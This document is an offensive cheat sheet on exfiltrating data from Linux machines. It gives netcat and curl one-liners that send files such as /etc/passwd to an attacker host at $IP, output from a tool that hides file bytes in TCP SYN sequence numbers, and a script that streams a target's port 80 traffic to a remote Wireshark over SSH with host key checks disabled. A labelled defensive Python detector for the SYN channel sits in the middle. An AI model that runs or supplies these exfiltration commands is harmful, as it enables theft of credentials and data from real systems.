Data Exfiltration in Linux
Raw data exfiltration through port 443
On target machine:
nc -nvv $IP 443 < input.txt
On attacker machine:
nc -nvlp 443 > input.txt
HTTP POST data exfiltration through port 8080
On target machine:
curl -T /etc/passwd http://$IP:8080
On attacker machine:
nc -nvlp 8080 | tee passwd
Data exfiltration using TCP SYN
We can use the sequence number field of TCP SYN packets to exfiltrate data; as the output below shows, each SYN carries four bytes of the file encoded as its 32-bit sequence number:
$ ./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5c
using interface: eth0
#1 [Read from file "at:x"] [Encoded SEQ #: 0x61743a78] [Wrote 74 bytes]
#2 [Read from file ":25:"] [Encoded SEQ #: 0x3a32353a] [Wrote 74 bytes]
#3 [Read from file "25:B"] [Encoded SEQ #: 0x32353a42] [Wrote 74 bytes]
#4 [Read from file "atch"] [Encoded SEQ #: 0x61746368] [Wrote 74 bytes]
#5 [Read from file " job"] [Encoded SEQ #: 0x206a6f62] [Wrote 74 bytes]
#6 [Read from file "s da"] [Encoded SEQ #: 0x73206461] [Wrote 74 bytes]
#7 [Read from file "emon"] [Encoded SEQ #: 0x656d6f6e] [Wrote 74 bytes]
#8 [Read from file ":/va"] [Encoded SEQ #: 0x3a2f7661] [Wrote 74 bytes]
#9 [Read from file "r/sp"] [Encoded SEQ #: 0x722f7370] [Wrote 74 bytes]
#10 [Read from file "ool/"] [Encoded SEQ #: 0x6f6f6c2f] [Wrote 74 bytes]
[...]
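From the defender's side, this channel is visible because a genuine initial sequence number is random, while one carrying file bytes is almost always four printable ASCII characters. The following added example (not part of the original page or of the syn-file tool) scores each source host on that property over a constructed set of SYN records, and decodes the flagged sequence numbers so an analyst can see what left the network; the IP addresses and thresholds are assumptions.

```python
"""Detect file bytes hidden in the 32-bit ISN of TCP SYN packets.

Heuristic: a random ISN has all four bytes printable with probability
(95/256)**4, roughly 2 %.  A source whose SYNs are nearly all printable
is flagged and its ISNs are reassembled for the analyst.
"""
from collections import defaultdict

# Constructed sample: (src_ip, dst_ip, dst_port, seq).  The first ten
# entries reuse the sequence numbers printed by syn-file above; the last
# three stand in for ordinary connections with random ISNs.
SYNS = [
    ("10.0.0.5", "192.168.1.158", 8080, 0x61743A78),
    ("10.0.0.5", "192.168.1.158", 8080, 0x3A32353A),
    ("10.0.0.5", "192.168.1.158", 8080, 0x32353A42),
    ("10.0.0.5", "192.168.1.158", 8080, 0x61746368),
    ("10.0.0.5", "192.168.1.158", 8080, 0x206A6F62),
    ("10.0.0.5", "192.168.1.158", 8080, 0x73206461),
    ("10.0.0.5", "192.168.1.158", 8080, 0x656D6F6E),
    ("10.0.0.5", "192.168.1.158", 8080, 0x3A2F7661),
    ("10.0.0.5", "192.168.1.158", 8080, 0x722F7370),
    ("10.0.0.5", "192.168.1.158", 8080, 0x6F6F6C2F),
    ("10.0.0.7", "93.184.216.34", 443, 0x8F3C21D9),
    ("10.0.0.7", "93.184.216.34", 443, 0x04A7FFE2),
    ("10.0.0.7", "93.184.216.34", 443, 0x41424344),  # random ISN that spells "ABCD"
]


def isn_is_printable(seq: int) -> bool:
    """True when every byte of the 32-bit ISN is printable ASCII (0x20-0x7E)."""
    return all(0x20 <= b <= 0x7E for b in seq.to_bytes(4, "big"))


def flag_sources(syns, min_syns=8, min_ratio=0.9):
    """Return {src_ip: reassembled_bytes} for sources whose ISNs look like text.

    min_syns avoids flagging a host on a handful of coincidences (like "ABCD"
    above); min_ratio tolerates a few legitimate connections mixed in.
    """
    per_src = defaultdict(list)
    for src, _dst, _dport, seq in syns:
        per_src[src].append(seq)
    flagged = {}
    for src, seqs in per_src.items():
        hits = sum(isn_is_printable(s) for s in seqs)
        if len(seqs) >= min_syns and hits / len(seqs) >= min_ratio:
            flagged[src] = b"".join(s.to_bytes(4, "big") for s in seqs)
    return flagged


if __name__ == "__main__":
    for src, data in flag_sources(SYNS).items():
        print(f"{src}: {len(data)} bytes carried in SYN sequence numbers: {data!r}")
```

Fed the sample above, the script flags only 10.0.0.5 and reassembles the leaked fragment of /etc/passwd ("at:x:25:25:Batch jobs daemon:/var/spool/"); in practice the records would come from a packet capture or flow log rather than a literal list.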
Mirror target traffic on port 80 to a remote host
#!/bin/bash
sudo su -c "mkfifo /tmp/sharkfin"
sudo su -c "chmod 777 /tmp/sharkfin"
sudo su -c "wireshark -k -i /tmp/sharkfin &"
ssh -i ~/.ssh/id_ssh -o StrictHostKeyChecking=no -p 22 [email protected] "tcpdump -U -s0 -w - -i eth0 'port 80'" > /tmp/sharkfin